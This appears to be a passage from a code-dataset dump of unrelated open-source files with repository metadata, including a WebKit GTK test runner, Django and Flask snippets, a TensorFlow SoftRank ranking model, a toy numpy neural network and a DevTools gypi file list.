SKIPPED = [ "unittests/testdownload", "unittests/testwebview", "unittests/testwebresource"]
def __init__(self):
self._executive = Executive()
# FIXME: webkit-build-directory --configuration always returns
# Release because we never call set-webkit-configuration.
#build_directory_script = os.path.join(os.path.dirname(__file__), "webkit-build-directory")
#build_directory = self._executive.run_command([build_directory_script, "--configuration"]).rstrip()
def is_valid_build_directory(build_dir):
return os.path.exists(os.path.join(build_dir, ".libs"))
script_dir = os.path.dirname(__file__)
top_level = os.path.normpath(os.path.join(script_dir, "..", ".."))
build_directory = os.path.join(top_level, 'WebKitBuild', 'Release')
if not is_valid_build_directory(build_directory):
build_directory = os.path.join(top_level, 'WebKitBuild', 'Debug')
self._gtk_tools_directory = os.path.join(top_level, "Tools", "gtk")
self._programs_path = os.path.join(build_directory, "Programs")
self._tests = []
for test_dir in self.TEST_DIRS:
absolute_test_dir = os.path.join(self._programs_path, test_dir)
if not os.path.isdir(absolute_test_dir):
continue
for test_file in os.listdir(absolute_test_dir):
test_relative_path = os.path.join(test_dir, test_file)
if test_relative_path in self.SKIPPED:
sys.stdout.write("Skipping test %s\n" % (test_relative_path))
sys.stdout.flush()
continue
test_path = os.path.join(self._programs_path, test_relative_path)
if os.path.isfile(test_path) and os.access(test_path, os.X_OK):
self._tests.append(test_path)
def run(self):
if not self._tests:
sys.stderr.write("ERROR: tests not found in %s.\n" % (self._programs_path))
sys.stderr.flush()
return 1
test_env = os.environ
test_env["DISPLAY"] = ":55"
exit_status = [0]
def _error_handler(error):
exit_status[0] = error.exit_code
jhbuild_path = os.path.join(self._gtk_tools_directory, "run-with-jhbuild")
for test in self._tests:
            out = self._executive.run_command([jhbuild_path, 'gtester', test], env=test_env,
error_handler=_error_handler)
sys.stdout.write(out)
sys.stdout.flush()
if exit_status[0]:
sys.stdout.write("Tests failed\n")
sys.stdout.flush()
return exit_status[0]
if __name__ == "__main__":
try:
xvfb = Executive().popen(["Xvfb", ":55", "-screen", "0", "800x600x24", "-nolisten", "tcp"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except:
sys.stderr.write("Failed to run Xvfb\n")
sys.stderr.flush()
sys.exit(1)
try:
sys.exit(TestRunner().run())
finally:
xvfb.kill()
|
[
"cumtcsgpf@gmail.com"
] |
cumtcsgpf@gmail.com
|
|
08922950ea62ec4b9ef9069f09d94cce46ec64e0
|
add5b4f0438ff415515818f8f466a6e88dc211ad
|
/pythoncount.py
|
8f98d156c82317b187d76712ae46595585fc2378
|
[] |
no_license
|
pavithraabhi/repo
|
93872014c81983b37d3527f9c4b7637161f38be1
|
9ad9b0f6c418e82441bd6f1af1698415cf4562f1
|
refs/heads/master
| 2020-05-28T09:13:14.971625
| 2019-08-15T15:55:25
| 2019-08-15T15:55:25
| 188,951,732
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 73
|
py
|
q = int(input())
count = 0
if q == 0:
    count = 1  # zero still has one digit
while q > 0:
    q = q // 10
    count += 1
print(count)
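# Example: entering 12345 prints 5; the explicit q == 0 branch above covers
# the one-digit edge case for zero.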
|
[
"noreply@github.com"
] |
pavithraabhi.noreply@github.com
|
c9e956b886d8dcdf622ade6c0496f384110b170c
|
c87ef08c32872450dc12eb4f744aed4a45ffa2b3
|
/accounts/urls.py
|
485d9a05266777f0cae81448adbbfb7cf84c4a70
|
[
"CC0-1.0"
] |
permissive
|
webguru071/Django-Ecommerce-Demo
|
ce9f6b09d305fab4dbe11112a037bd3b98ce6ada
|
a82e921cbec0c933eecd95a6214f484dac10d073
|
refs/heads/master
| 2023-01-06T12:19:04.202452
| 2020-01-09T06:02:09
| 2020-01-09T06:02:09
| 232,733,797
| 1
| 0
|
CC0-1.0
| 2022-12-26T20:16:13
| 2020-01-09T05:58:50
|
Python
|
UTF-8
|
Python
| false
| false
| 378
|
py
|
from django.conf.urls import url, include
from . import urls_reset
from .views import register, profile, logout, login
urlpatterns = [
url(r'^register/$', register, name='register'),
url(r'^profile/$', profile, name='profile'),
url(r'^logout/$', logout, name='logout'),
url(r'^login/$', login, name='login'),
url(r'^password-reset/', include(urls_reset)),
]
|
[
"saumenroy323@gmail.com"
] |
saumenroy323@gmail.com
|
9b21a2a6c8b79f9e3c4eff182c2ca2e856aebab3
|
da56609056dbae44701a5419a77a1c6da140306f
|
/flask-by-example/worker.py
|
24373f54a05cb90ef0cc3ec8162cf58c1c470895
|
[] |
no_license
|
aibars/python-examples
|
5e22381cad9ac7ddc463cc8fa66939c30646ce12
|
96bfdaf1bbdc56f502430ca551478830e655018a
|
refs/heads/master
| 2022-09-23T14:56:54.858293
| 2022-01-17T15:25:45
| 2022-01-17T15:25:45
| 213,754,386
| 0
| 0
| null | 2022-09-16T18:10:43
| 2019-10-08T21:05:27
|
Python
|
UTF-8
|
Python
| false
| false
| 314
|
py
|
import os
import redis
from rq import Worker, Queue, Connection
listen = ['default']
redis_url = os.getenv('REDISTOGO_URL', 'redis://localhost:6379')
conn = redis.from_url(redis_url)
if __name__ == '__main__':
with Connection(conn):
worker = Worker(list(map(Queue, listen)))
worker.work()
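# Producer-side sketch (illustrative only; my_module.my_task is a placeholder,
# not part of this repository):
#
#   from rq import Queue
#   q = Queue('default', connection=conn)
#   q.enqueue('my_module.my_task', 42)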
|
[
"agustin.ibars@gmail.com"
] |
agustin.ibars@gmail.com
|
184ca3e5b811eacd6c90174f19b3fc4c651aaea6
|
cc718e58364101a1af040aec15dc53cb713ab9d4
|
/approachs/softrank.py
|
0be7175d913d00466d08f831ab16290bf294c90d
|
[] |
no_license
|
liupengcnu/RerankSim
|
87250ecaf0ce793e2d38982b511e969d4419f2f8
|
c53798e85ad8218e0b3ba92782edcf91c9ce5bc1
|
refs/heads/main
| 2023-05-18T15:02:58.448419
| 2021-06-10T01:32:34
| 2021-06-10T01:32:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,120
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.framework import dtypes
import numpy as np
from approachs.model import Model
from approachs.dnn_model import DNNModel
class SoftRank(DNNModel):
def __init__(self, params, model_path, model_name):
self.softRank_theta = 0.1
super(SoftRank, self).__init__(params, model_path, model_name)
def _build_net(self):
self.list_index = tf.placeholder(dtype=tf.int32, shape=(None, self.params.slate_size), name='list_index')
self.batch_index_bias = tf.placeholder(tf.int32, shape=[None])
self.batch_expansion_mat = tf.placeholder(tf.float32, shape=[None, 1])
self.batch_diag = tf.placeholder(tf.float32, shape=[None, self.params.slate_size, self.params.slate_size])
x_input = self._get_feature()
# dnn
layers = [64, 32, 1]
activation = [tf.nn.relu for _ in range(len(layers)-1)] + [None]
with tf.variable_scope('dnn'):
for i, (dim, act) in enumerate(zip(layers, activation)):
x_input = tf.layers.dense(inputs=x_input,
units=dim,
activation=act,
kernel_regularizer=tf.contrib.layers.l2_regularizer(self.params.l2_regu),
name='layer_'+str(i),
reuse=tf.AUTO_REUSE)
logits = x_input
list_labels = tf.reshape(self.y, [-1, self.params.slate_size], name='list_labels')
list_logits = tf.reshape(logits, [-1, self.params.slate_size], name='list_logits')
rank_loss = self._soft_rank_loss(list_logits, list_labels, self.list_index)
l2_loss = tf.losses.get_regularization_loss()
loss = rank_loss + l2_loss
return logits, loss
    def integral_Gaussian(self, mu, theta):
a = -4.0 / math.sqrt(2.0 * math.pi) / theta
exp_mu = tf.exp(a * mu)
ig = tf.div(exp_mu, exp_mu + 1) * -1.0 + 1
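        # ig reduces to sigmoid(4 * mu / (sqrt(2 * pi) * theta)): a logistic
        # approximation of the Gaussian CDF that SoftRank uses to turn a score
        # difference mu into a pairwise "i beats j" probability.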
return ig
def _soft_rank_loss(self, output, target_rels, target_indexs, name="softRank"):
target_indexs = [tf.reshape(x, [-1]) for x in tf.split(target_indexs, self.params.slate_size, axis=1)]
target_rels = [tf.reshape(x, [-1]) for x in tf.split(target_rels, self.params.slate_size, axis=1)]
loss = None
batch_size = tf.shape(target_rels[0])[0]
theta = 0.1
with tf.variable_scope(name):
output = tf.nn.l2_normalize(output, 1)
# compute pi_i_j
tmp = tf.concat(axis=1, values=[self.batch_expansion_mat for _ in range(self.params.slate_size)])
tmp_expand = tf.expand_dims(tmp, -2)
output_expand = tf.expand_dims(output, -2)
dif = tf.subtract(tf.matmul(tf.matrix_transpose(output_expand), tmp_expand),
tf.matmul(tf.matrix_transpose(tmp_expand), output_expand))
            # unpacked_pi = self.integral_Gaussian(dif, theta)
            unpacked_pi = tf.add(self.integral_Gaussian(dif, self.softRank_theta),
self.batch_diag) # make diag equal to 1.0
# may need to unpack pi: pi_i_j is the probability that i is bigger than j
pi = tf.unstack(unpacked_pi, None, 1)
for i in range(self.params.slate_size):
pi[i] = tf.unstack(pi[i], None, 1)
# compute rank distribution p_j_r
one_zeros = tf.matmul(self.batch_expansion_mat,
tf.constant([1.0] + [0.0 for r in range(self.params.slate_size - 1)], tf.float32,
[1, self.params.slate_size]))
# initial_value = tf.unpack(one_zeros, None, 1)
pr = [one_zeros for _ in range(self.params.slate_size)] # [i][r][None]
# debug_pr_1 = [one_zeros for _ in range(self.params.slate_size)] #[i][r][None]
for i in range(self.params.slate_size):
for j in range(self.params.slate_size):
# if i != j: #insert doc j
pr_1 = tf.pad(tf.stack(tf.unstack(pr[i], None, 1)[:-1], 1), [[0, 0], [1, 0]], mode='CONSTANT')
# debug_pr_1[i] = pr_1
# pr_1 = tf.concat(1, [self.batch_expansion_mat*0.0, tf.unpack(pr[i], None, 1)[:-1]])
factor = tf.tile(tf.expand_dims(pi[i][j], -1), [1, self.params.slate_size])
# print(factor.get_shape())
pr[i] = tf.add(tf.multiply(pr[i], factor),
tf.multiply(pr_1, 1.0 - factor))
# compute expected NDCG
# compute Gmax
Dr = tf.matmul(self.batch_expansion_mat,
tf.constant([1.0 / math.log(2.0 + r) for r in range(self.params.slate_size)], tf.float32,
[1, self.params.slate_size]))
gmaxs = []
for i in range(self.params.slate_size):
idx = target_indexs[i] + tf.to_int32(self.batch_index_bias)
g = embedding_ops.embedding_lookup(target_rels, idx)
gmaxs.append(g)
_gmax = tf.exp(tf.stack(gmaxs, 1)) * (1.0 / math.log(2))
Gmax = tf.reduce_sum(tf.multiply(Dr, _gmax), 1)
# compute E(Dr)
Edrs = []
for i in range(self.params.slate_size):
edr = tf.multiply(Dr, pr[i])
Edrs.append(tf.reduce_sum(edr, 1))
# compute g(j)
g = tf.exp(tf.stack(target_rels, 1)) * (1.0 / math.log(2))
dcg = tf.multiply(g, tf.stack(Edrs, 1))
Edcg = tf.reduce_sum(dcg, 1)
Ndcg = tf.div(Edcg, Gmax)
# compute loss
loss = (Ndcg * -1.0 + 1) * 10
return math_ops.reduce_sum(loss) / math_ops.cast(batch_size, dtypes.float32) # , pi, pr, Ndcg]
def train(self, samples, labels):
with self.graph.as_default():
assert samples.shape[0] == labels.shape[0]
batch_size = samples.shape[0]
size = self.params.slate_size
# feed
index = np.array(
[sorted(range(self.params.slate_size), key=lambda k:labels[i][k], reverse=True) for i in range(batch_size)]
)
batch_index_bias_v = np.array([i * self.params.slate_size for i in range(batch_size)])
batch_expansion_mat_v = np.ones((batch_size, 1))
batch_diag_v = np.array(
[np.diag([0.5 for x in range(self.params.slate_size)]) for _ in range(batch_size)]
)
# reshape
samples = samples.reshape((-1, samples.shape[-1]))
labels = labels.reshape((-1, ))
# train
_, loss, gauc, ndcg, pv_auc, step, summary = self.sess.run(
[self.opt, self.loss, self.gauc, self.ndcg, self.pv_auc, self.global_step, self.train_merged],
feed_dict={self.x: samples,
self.y: labels,
self.list_index:index,
self.batch_index_bias: batch_index_bias_v,
self.batch_expansion_mat: batch_expansion_mat_v,
self.batch_diag: batch_diag_v
})
return loss, gauc, ndcg, pv_auc, step, summary
def evaluate(self, samples, labels):
with self.graph.as_default():
batch_size = samples.shape[0]
# feed
index = np.array(
[sorted(range(self.params.slate_size), key=lambda k:labels[i][k], reverse=True) for i in range(batch_size)]
)
batch_index_bias_v = np.array([i * self.params.slate_size for i in range(batch_size)])
batch_expansion_mat_v = np.ones((batch_size, 1))
batch_diag_v = np.array(
[np.diag([0.5 for x in range(self.params.slate_size)]) for _ in range(batch_size)]
)
# reshape
samples = samples.reshape((-1, samples.shape[-1]))
labels = labels.reshape((-1, ))
#
loss, gauc, ndcg, pv_auc, step, summary = self.sess.run(
[self.loss, self.gauc, self.ndcg, self.pv_auc, self.global_step, self.test_merged],
feed_dict={self.x: samples,
self.y: labels,
self.list_index:index,
self.batch_index_bias: batch_index_bias_v,
self.batch_expansion_mat: batch_expansion_mat_v,
self.batch_diag: batch_diag_v
})
return loss, gauc, ndcg, pv_auc, step, summary
|
[
"yongqing.gyq@alibaba-inc.com"
] |
yongqing.gyq@alibaba-inc.com
|
65affae5a631c8898bb4d018b1b598f62f2ed797
|
0d79a06910b89bbbc8fe9129f6f9703392d7cbfc
|
/NeuralNetwork.py
|
162570fbe9cf6e53fc6cca761ac6a1c129e5976a
|
[
"MIT"
] |
permissive
|
codym95/Neuralectric
|
310e234c3bda1538dd9ef2d0cc89d38e925c14a0
|
af2b0355f37654b1cce34c4a6246d8d303be7b3e
|
refs/heads/master
| 2020-04-04T21:23:52.655733
| 2018-11-05T06:59:17
| 2018-11-05T06:59:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,265
|
py
|
import numpy as np
# X = (hours sleeping, hours studying), y = score on test
#X = np.array(([2, 9], [1, 5], [3, 6]), dtype=float)
#y = np.array(([92], [86], [89]), dtype=float)
X = np.array(([0, 0], [0, 1], [1, 0], [1, 1]),)
y = np.array(([0], [1], [1], [0]),)
class NeuralNetwork(object):
def __init__(self):
#parameters
self.inputSize = 2
self.outputSize = 1
self.hiddenSize = 3
self.learningrate = 0.01
self.W1 = np.random.randn(self.inputSize, self.hiddenSize)
self.W2 = np.random.randn(self.hiddenSize, self.outputSize)
def forward(self, X):
#forward propagation through our network
        self.z = np.dot(X, self.W1) # dot product of X (input) and first set of 2x3 weights
self.z2 = self.relu(self.z) # activation function
self.z3 = np.dot(self.z2, self.W2) # dot product of hidden layer (z2) and second set of 3x1 weights
o = self.relu(self.z3) # final activation function
return o
def sigmoid(self, s):
# activation function
return 1/(1+np.exp(-s))
def sigmoidPrime(self, s):
#derivative of sigmoid
return s * (1 - s)
def relu(self, x):
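        # note: despite the name, this is a leaky ReLU (slope 0.01 for x < 0)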
return np.where(x < 0, 0.01 * x, x)
def relu_d(self, x):
return np.where(x < 0, 0.01, 1)
def backward(self, X, y, o):
        # backward propagate through the network
        self.o_error = y - o # error in output
        self.o_delta = self.o_error*self.relu_d(o) # applying derivative of leaky ReLU to error
        self.z2_error = self.o_delta.dot(self.W2.T) # z2 error: how much our hidden layer weights contributed to output error
        self.z2_delta = self.z2_error*self.relu_d(self.z2) # applying derivative of leaky ReLU to z2 error
self.W1 += X.T.dot(self.z2_delta)*self.learningrate # adjusting first set (input --> hidden) weights
self.W2 += self.z2.T.dot(self.o_delta)*self.learningrate # adjusting second set (hidden --> output) weights
def train (self, X, y):
o = self.forward(X)
self.backward(X, y, o)
NN = NeuralNetwork()
for i in range(20000): # trains the NN 20,000 times
print("Input: \n" + str(X))
print("Actual Output: \n" + str(y))
print("Predicted Output: \n" + str(NN.forward(X)))
print("Loss: \n" + str(np.mean(np.square(y - NN.forward(X))))) # mean sum squared loss
print("\n")
NN.train(X, y)
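# Note (an observation, not from the original): with no bias terms and
# unseeded random weights, this XOR fit may or may not converge on a given
# run; calling np.random.seed(...) first makes runs repeatable.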
|
[
"jrcoop34@gmail.com"
] |
jrcoop34@gmail.com
|
650c6a4a6b0f91ab1d27334a8a3a9252847cb343
|
6b320577d0d89f24f08098939ef9c4f548a21a06
|
/data.py
|
005b858cc48ec235b7490ea21dcbafa1eb83874c
|
[] |
no_license
|
ShreyesBhat/StudentInformationSystem
|
46bb20c2aa4830f3d7807773a62740bb1a3954e1
|
117b86b7a3e1503103499827a5aa5ce062710e11
|
refs/heads/master
| 2020-04-10T23:44:06.578438
| 2018-08-08T15:20:51
| 2018-08-08T15:20:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
def Semesters():
semesters = [
{
'id' : 1,
'title':'First',
},
{
'id' : 2,
'title':'Second',
},
{
'id' : 3,
'title':'Third',
},
{
'id' : 4,
'title':'Fourth',
},
{
'id' : 5,
'title':'Fifth',
},
{
'id' : 6,
'title':'Sixth',
},
{
'id' : 7,
'title':'Seventh',
},
{
'id' : 8,
            'title':'Eighth',
},
]
return semesters
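# Example: [s['title'] for s in Semesters()][:3] == ['First', 'Second', 'Third']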
|
[
"akshay.madiwalar@thughtclan.com"
] |
akshay.madiwalar@thughtclan.com
|
7300a81feea9fcbde4bbb73d634e207a77dccfdf
|
2e63d5782d19628006a5902db6ff40765a262530
|
/manage.py
|
afbb6c208b74e367b68582bd5fac408b5ff5e43b
|
[] |
no_license
|
gkuwanto/metalurgi_dosen
|
fdf5e21d1a5d8913593c261f5d2449beb5a685a4
|
66582d50c5b0984788702452d063bf6f0ea02829
|
refs/heads/master
| 2020-12-15T16:07:45.611920
| 2020-01-20T19:50:33
| 2020-01-20T19:50:33
| 235,170,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 629
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'metalurgi.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"gkuwanto@gmail.com"
] |
gkuwanto@gmail.com
|
63ff19314e24c7019278ccd81b420f97afa939cb
|
b2c637c4b27b05f5d9ce933baba96480a46b61f1
|
/ex043.py
|
e5dddbb7152567060e82319e0779b0d579f67b2b
|
[] |
no_license
|
LucasSM18/Aulas-de-Python---Exercicios-resolvidos
|
7aa55ebea0099d29beb288c9ff49c642ef0db898
|
e56abe97f2ba941b7cf0ccf6de7d679b621ed995
|
refs/heads/main
| 2022-12-30T02:51:09.588960
| 2020-10-19T16:59:52
| 2020-10-19T16:59:52
| 305,453,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 437
|
py
|
from datetime import date
ano = int(input('Year of birth: '))
atual = date.today().year
idade = atual - ano
print('The athlete is {} years old'.format(idade))
if idade <= 9:
    print('Classification: MIRIM')
elif idade <= 14:
    print('Classification: INFANTIL')
elif idade <= 19:
    print('Classification: JUNIOR')
elif idade <= 25:
    print('Classification: SÊNIOR')
else:
    print('Classification: MASTER')
|
[
"noreply@github.com"
] |
LucasSM18.noreply@github.com
|
6042e2224d0212c185b9add12624f576174a1060
|
5de041cce04d994b899d169186c039a233dc2501
|
/utils/my_logger.py
|
2ef75e21b975c620529a65db946bc39dfab15fed
|
[] |
no_license
|
keyzf/AutoTest_UI
|
d3ea3a51abc95520fac8761a95744757ce8fac15
|
8cbb984e96452c20e0a24543946030f7ef9a3b02
|
refs/heads/master
| 2022-11-24T23:23:32.227602
| 2020-07-27T15:00:14
| 2020-07-27T15:00:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,762
|
py
|
import logging
from config.PATH import *
import time
from utils.common import *
from utils.read_yaml import ReadYaml
day = time.strftime('%Y-%m-%d', time.localtime(time.time()))
file = os.path.join(TEST_LOG, '{}.log'.format(day))
yaml_data = ReadYaml(YAML).get_yaml()
class MyLog:
def __init__(self,
module_name,
all_level="DEBUG",
stream_level="INFO",
file_level="INFO",
all_format="[%(asctime)s] %(levelname)s [%(filename)s, %(lineno)d] %(message)s",
date_format="%Y-%m-%d %H:%M:%S",
log_file=file):
        if not os.path.exists(TEST_LOG):
            os.mkdir(TEST_LOG)  # create the test-log directory
        if not os.path.exists(log_file):
            open(log_file, 'w')  # create the test-log file
        self.logger = logging.getLogger(module_name)  # log collector
        self.logger.setLevel(all_level)  # level of messages the collector accepts
        self.log_format = logging.Formatter(
            fmt=all_format,
            datefmt=date_format)  # log message format
        # console logging
        self.ch = logging.StreamHandler()  # console output handler
        self.ch.setFormatter(self.log_format)  # format for console messages
        self.ch.setLevel(stream_level)  # level for console messages
        # file logging
        self.fh = logging.FileHandler(filename=log_file, mode='a', encoding='utf-8')  # mode='a' appends
        self.fh.setFormatter(self.log_format)  # format for file messages
        self.fh.setLevel(file_level)  # level for file messages
        # attach the output handlers
        self.logger.addHandler(self.ch)  # stream handler for console output
        self.logger.addHandler(self.fh)
def __del__(self):
self.delete_handle()
def get_logger(self):
return self.logger
def delete_handle(self):
        # remove the handlers to avoid duplicated log output
        self.logger.removeHandler(self.ch)
        self.logger.removeHandler(self.fh)
        # close the .log file handles to release resources
        self.ch.close()
        self.fh.close()
my_logger = MyLog(module_name=get_module_name(),
all_level=yaml_data["logger"]["all_level"],
stream_level=yaml_data["logger"]["stream_level"],
file_level=yaml_data["logger"]["file_level"],
all_format=yaml_data["logger"]["all_format"],
date_format=yaml_data["logger"]["date_format"])
log = my_logger.get_logger()
if __name__ == '__main__':
    # log.debug("a debug message")
    # log.info("an info message")
    # log.warning("a warning message")
    # log.error("an error message")
pass
|
[
"2398335323@qq.com"
] |
2398335323@qq.com
|
6b77faebaa6f3446a44f263b97518ca25808ff57
|
17fb5e4cdcf8e557bd0ab8606dfd88074dc4d525
|
/ticket_26333/models.py
|
0cbe86a46dbea612388e84d5022281172a510cc1
|
[] |
no_license
|
charettes/django-ticketing
|
0b17c85afa049d1b73db244e1199798feb9a4b73
|
78ed6a345e760ea46434690e9385ae4d26fc2810
|
refs/heads/master
| 2021-01-17T06:38:35.337305
| 2016-06-15T02:33:38
| 2016-06-15T02:33:38
| 45,122,368
| 0
| 1
| null | 2016-02-09T20:21:48
| 2015-10-28T15:30:59
|
Python
|
UTF-8
|
Python
| false
| false
| 255
|
py
|
from django.contrib.gis.db import models as gis
from django.contrib.gis.geos import Point
from django.db import models
POINT = Point(-104.9903, 39.7392, srid=4326)
class PagedModel(models.Model):
location = gis.PointField(srid=4326, default=POINT)
|
[
"charette.s@gmail.com"
] |
charette.s@gmail.com
|
6a41ebef16e06874f1aab4ac728641e3b01e0900
|
bb6ebff7a7f6140903d37905c350954ff6599091
|
/third_party/WebKit/Source/devtools/devtools.gypi
|
7352471a16d41573bde00923debb78f710603bdf
|
[
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0"
] |
permissive
|
PDi-Communication-Systems-Inc/lollipop_external_chromium_org
|
faa6602bd6bfd9b9b6277ce3cd16df0bd26e7f2f
|
ccadf4e63dd34be157281f53fe213d09a8c66d2c
|
refs/heads/master
| 2022-12-23T18:07:04.568931
| 2016-04-11T16:03:36
| 2016-04-11T16:03:36
| 53,677,925
| 0
| 1
|
BSD-3-Clause
| 2022-12-09T23:46:46
| 2016-03-11T15:49:07
|
C++
|
UTF-8
|
Python
| false
| false
| 27,014
|
gypi
|
#
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
{
'variables': {
# If debug_devtools is set to 1, JavaScript files for DevTools are
# stored as is. Otherwise, a concatenated file is stored.
'debug_devtools%': 0,
'devtools_core_js_files': [
'<@(devtools_core_base_js_files)',
'<@(devtools_common_js_files)',
'<@(devtools_sdk_js_files)',
'<@(devtools_ui_js_files)',
'<@(devtools_components_js_files)',
],
'devtools_core_base_js_files': [
'front_end/inspector.html',
'front_end/Tests.js',
'front_end/ForwardedInputEventHandler.js',
'front_end/InspectorFrontendAPI.js',
'front_end/InspectorFrontendEventSink.js',
'front_end/InspectorFrontendHostStub.js',
'front_end/jsdifflib.js',
'front_end/MediaQueryInspector.js',
'front_end/ResponsiveDesignView.js',
'front_end/ScreencastView.js',
'front_end/TestController.js',
'front_end/dialog.css',
'front_end/inspector.css',
'front_end/tabbedPane.css',
'front_end/inspectorSyntaxHighlight.css',
'front_end/popover.css',
'<@(devtools_main_js_files)',
'<@(devtools_standalone_files)',
],
'devtools_common_js_files': [
'front_end/common/Color.js',
'front_end/common/CompletionDictionary.js',
'front_end/common/DOMExtension.js',
'front_end/common/Geometry.js',
'front_end/common/MessageSink.js',
'front_end/common/ModuleManager.js',
'front_end/common/modules.js',
'front_end/common/Object.js',
'front_end/common/ParsedURL.js',
'front_end/common/Platform.js',
'front_end/common/Progress.js',
'front_end/common/Settings.js',
'front_end/common/TextRange.js',
'front_end/common/Throttler.js',
'front_end/common/UIString.js',
'front_end/common/UserMetrics.js',
'front_end/common/utilities.js',
'front_end/common/WebInspector.js',
],
'devtools_sdk_js_files': [
'front_end/sdk/ApplicationCacheModel.js',
'front_end/sdk/CompilerScriptMapping.js',
'front_end/sdk/ConsoleModel.js',
'front_end/sdk/ContentProvider.js',
'front_end/sdk/ContentProviderBasedProjectDelegate.js',
'front_end/sdk/ContentProviders.js',
'front_end/sdk/CookieParser.js',
'front_end/sdk/CPUProfileModel.js',
'front_end/sdk/CPUProfilerModel.js',
'front_end/sdk/CSSMetadata.js',
'front_end/sdk/CSSParser.js',
'front_end/sdk/CSSStyleModel.js',
'front_end/sdk/CSSStyleSheetMapping.js',
'front_end/sdk/BreakpointManager.js',
'front_end/sdk/DOMModel.js',
'front_end/sdk/DOMStorage.js',
'front_end/sdk/Database.js',
'front_end/sdk/DebuggerModel.js',
'front_end/sdk/DebuggerScriptMapping.js',
'front_end/sdk/DefaultScriptMapping.js',
'front_end/sdk/FileManager.js',
'front_end/sdk/FileSystemMapping.js',
'front_end/sdk/FileSystemModel.js',
'front_end/sdk/FileSystemWorkspaceBinding.js',
'front_end/sdk/FileUtils.js',
'front_end/sdk/IndexedDBModel.js',
'front_end/sdk/InspectorBackend.js',
'front_end/sdk/IsolatedFileSystemManager.js',
'front_end/sdk/IsolatedFileSystem.js',
'front_end/sdk/LayerTreeModel.js',
'front_end/sdk/Linkifier.js',
'front_end/sdk/LiveEditSupport.js',
'front_end/sdk/NetworkLog.js',
'front_end/sdk/NetworkManager.js',
'front_end/sdk/NetworkRequest.js',
'front_end/sdk/NetworkUISourceCodeProvider.js',
'front_end/sdk/NetworkWorkspaceBinding.js',
'front_end/sdk/NotificationService.js',
'front_end/sdk/OverridesSupport.js',
'front_end/sdk/PaintProfiler.js',
'front_end/sdk/PowerProfiler.js',
'front_end/sdk/PresentationConsoleMessageHelper.js',
'front_end/sdk/RemoteObject.js',
'front_end/sdk/Resource.js',
'front_end/sdk/ResourceScriptMapping.js',
'front_end/sdk/ResourceTreeModel.js',
'front_end/sdk/ResourceType.js',
'front_end/sdk/ResourceUtils.js',
'front_end/sdk/RuntimeModel.js',
'front_end/sdk/SASSSourceMapping.js',
'front_end/sdk/Script.js',
'front_end/sdk/ScriptSnippetModel.js',
'front_end/sdk/SearchConfig.js',
'front_end/sdk/SnippetStorage.js',
'front_end/sdk/SourceMap.js',
'front_end/sdk/SourceMapping.js',
'front_end/sdk/StylesSourceMapping.js',
'front_end/sdk/Target.js',
'front_end/sdk/TempFile.js',
'front_end/sdk/TimelineManager.js',
'front_end/sdk/UISourceCode.js',
'front_end/sdk/WorkerManager.js',
'front_end/sdk/WorkerTargetManager.js',
'front_end/sdk/Workspace.js',
'front_end/sdk/WorkspaceController.js',
],
'devtools_ui_js_files': [
'front_end/ui/ActionRegistry.js',
'front_end/ui/Checkbox.js',
'front_end/ui/Context.js',
'front_end/ui/ContextMenu.js',
'front_end/ui/DataGrid.js',
'front_end/ui/Dialog.js',
'front_end/ui/DropDownMenu.js',
'front_end/ui/EmptyView.js',
'front_end/ui/InplaceEditor.js',
'front_end/ui/KeyboardShortcut.js',
'front_end/ui/PieChart.js',
'front_end/ui/Popover.js',
'front_end/ui/ProgressIndicator.js',
'front_end/ui/ResizerWidget.js',
'front_end/ui/SettingsUI.js',
'front_end/ui/SidebarPane.js',
'front_end/ui/SidebarTreeElement.js',
'front_end/ui/ShortcutRegistry.js',
'front_end/ui/ShowMoreDataGridNode.js',
'front_end/ui/SoftContextMenu.js',
